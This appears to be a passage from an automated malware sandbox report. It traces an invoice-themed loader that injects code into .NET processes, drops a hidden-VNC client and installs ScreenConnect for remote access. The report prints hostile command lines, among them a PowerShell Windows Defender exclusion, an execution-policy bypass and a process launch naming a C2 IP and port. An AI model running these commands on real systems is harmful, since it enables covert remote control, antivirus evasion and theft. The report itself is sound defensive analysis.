                            Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformation
                            Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 8_2_00007FFA208D7D50 GetSystemInfo,GetNumaHighestNodeNumber,GetCurrentProcess,GetProcessGroupAffinity,GetLastError,GetCurrentProcess,GetProcessAffinityMask,8_2_00007FFA208D7D50
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeThread delayed: delay time: 922337203685477
                            Source: svchost.exe, 00000010.00000002.6326711079.000002CA7FC2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: svchost.exe, 00000010.00000002.6327666208.000002CA7FC64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000es
                            Source: svchost.exe, 00000010.00000002.6327666208.000002CA7FC64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell\v(@\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: svchost.exe, 00000010.00000003.6134213228.000002CA01290000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmci.sys
                            Source: svchost.exe, 00000010.00000002.6327666208.000002CA7FC64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                            Source: svchost.exe, 00000010.00000002.6326711079.000002CA7FC2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                            Source: newpoveno.exe, 00000008.00000002.1262523591.00007FFA2102F000.00000002.00000001.01000000.00000008.sdmp, newpoveno.exe, 00000016.00000002.1379147805.00007FFA16AAF000.00000002.00000001.01000000.0000000E.sdmp, newpoveno.exe, 0000001B.00000002.1458492651.00007FFA2102F000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
                            Source: Document.exe, 00000025.00000002.4231567785.000000000120B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}e}W
                            Source: svchost.exe, 00000038.00000002.6315147620.0000019729021000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXTVMWare
                            Source: svchost.exe, 00000003.00000002.3036859939.00000216C322B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3037188318.00000216C32D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2868188714.000001D22A45A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2865811537.000001D224E2B000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000000C.00000002.6316208460.000000000127C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                            Source: svchost.exe, 00000037.00000002.5964560767.000001E522E02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                            Source: svchost.exe, 00000010.00000002.6327666208.000002CA7FC64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                            Source: svchost.exe, 00000010.00000002.6329003846.000002CA7FD00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: newpoveno.exe, 00000016.00000002.1376376319.00000143E3339000.00000004.00000020.00020000.00000000.sdmp, newpoveno.exe, 0000001B.00000002.1457084700.0000024B50267000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6405133374.0000000004D0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: newpoveno.exe, 00000008.00000002.1260109220.000001B2AE227000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll[[
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 8_2_00007FF727F8A540 GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,8_2_00007FF727F8A540
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess token adjusted: Debug
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeProcess token adjusted: Debug
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeProcess token adjusted: Debug
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 8_2_00007FF727F81180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,_amsg_exit,8_2_00007FF727F81180
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 8_2_00007FFA2092E47C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00007FFA2092E47C
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 22_2_00007FF6CFFB1180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,_amsg_exit,22_2_00007FF6CFFB1180
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 22_2_00007FFA163AE47C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_00007FFA163AE47C
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FF6CFFB1180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,_amsg_exit,27_2_00007FF6CFFB1180
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 27_2_00007FFA2000E47C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,27_2_00007FFA2000E47C
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: page read and write | page guard

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            .NET source code references suspicious native API functions
                            Source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.raw.unpack, Keylogger.csReference to suspicious API methods: MapVirtualKey(vkCode, 0u)
                            Source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.raw.unpack, DInvokeCore.csReference to suspicious API methods: DynamicAPIInvoke("ntdll.dll", "NtProtectVirtualMemory", typeof(Delegates.NtProtectVirtualMemory), ref Parameters)
                            Source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.raw.unpack, AntiProcess.csReference to suspicious API methods: OpenProcess(1u, bInheritHandle: false, processId)
                            Source: 37.0.Document.exe.7dc3d4.1.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                            Source: 37.0.Document.exe.7dc3d4.1.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                            Source: 37.0.Document.exe.7dc3d4.1.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                            Source: 37.0.Document.exe.7dc3d4.1.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                            Source: 37.2.Document.exe.2e90000.0.raw.unpack, Program.csReference to suspicious API methods: FindResource(moduleHandle, e.Name, "FILES")
                            Adds a directory exclusion to Windows Defender
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force"
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force"Jump to behavior
                            Allocates memory in foreign processes
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and writeJump to behavior
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and write
                            Bypasses PowerShell execution policy
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\Document.exe"'
                            Injects a PE file into a foreign processes
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000 value starts with: 4D5A
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
                            Writes to foreign memory regions
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 414000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 42E000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: F97008Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 402000
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 40C000
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 40E000
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 31E008
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 414000
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 42E000
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 1061008
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 414000
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 42E000
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: E8C008
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\Document.exe"' & exit
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Default 176.65.142.74 4448 HVNC_MUTEX
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\SystemRootDoc\newpoveno.exe "C:\Users\user\SystemRootDoc\newpoveno.exe"
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\SystemRootDoc\newpoveno.exe "C:\Users\user\SystemRootDoc\newpoveno.exe"
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\Document.exe"'
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Document.exe "C:\Users\user\AppData\Local\Temp\Document.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\ea32d473b92f819d\ScreenConnect.ClientSetup.msi"
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\VenHide" --no-sandbox --allow-no-sandbox-job --disable-accelerated-layers --disable-accelerated-plugins --disable-audio --disable-gpu --disable-d3d11 --disable-accelerated-2d-canvas --disable-deadline-scheduling --disable-ui-deadline-scheduling --aura-no-shadows --mute-audio
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess created: unknown unknown
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess created: unknown unknown
                            Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (ea32d473b92f819d)\screenconnect.clientservice.exe" "?e=access&y=guest&h=instance-pi5ke2-relay.screenconnect.com&p=443&s=4e491804-ebd1-4ec1-a81d-3bf98af2b16f&k=bgiaaackaabsu0exaagaaaeaaqdv5xr%2f63euw3ywsiptbv5fncp0k%2fm1hgczug%2fuxvlae7zxcjaals5londk%2fctx1dhhik7zhi%2bklvnyucmcvnyhfawye7gkxdstfwcdw3bdg7bl1wsdbr9v3dcqthu0rculgn2clbfamycxt7huc8trgsembf6idtba81qiknawkvc0maxjuuhqgfknxh34ev1k7ffvthqqmafmwifar3wqa3i8zcb2o4gfszrm68%2fq2clfpysq9b17enlje%2b7b1y8uqgy%2brdfkado%2faislrmcniopabiw62z2rt8uyqlcaso4p%2bqqu%2ffwzznbs%2bocdygtzabbqn9vqtk0ur5xxodqt"
                            Source: ScreenConnect.WindowsClient.exe, 0000002E.00000000.4279525006.0000000000BB2000.00000002.00000001.01000000.0000001C.sdmpBinary or memory string: Progman
                            Source: ScreenConnect.WindowsClient.exe, 0000002E.00000000.4279525006.0000000000BB2000.00000002.00000001.01000000.0000001C.sdmpBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 8_2_00007FFA208C8AA0 cpuid 8_2_00007FFA208C8AA0
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: GetLocaleInfoEx,8_2_00007FFA20E31460
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
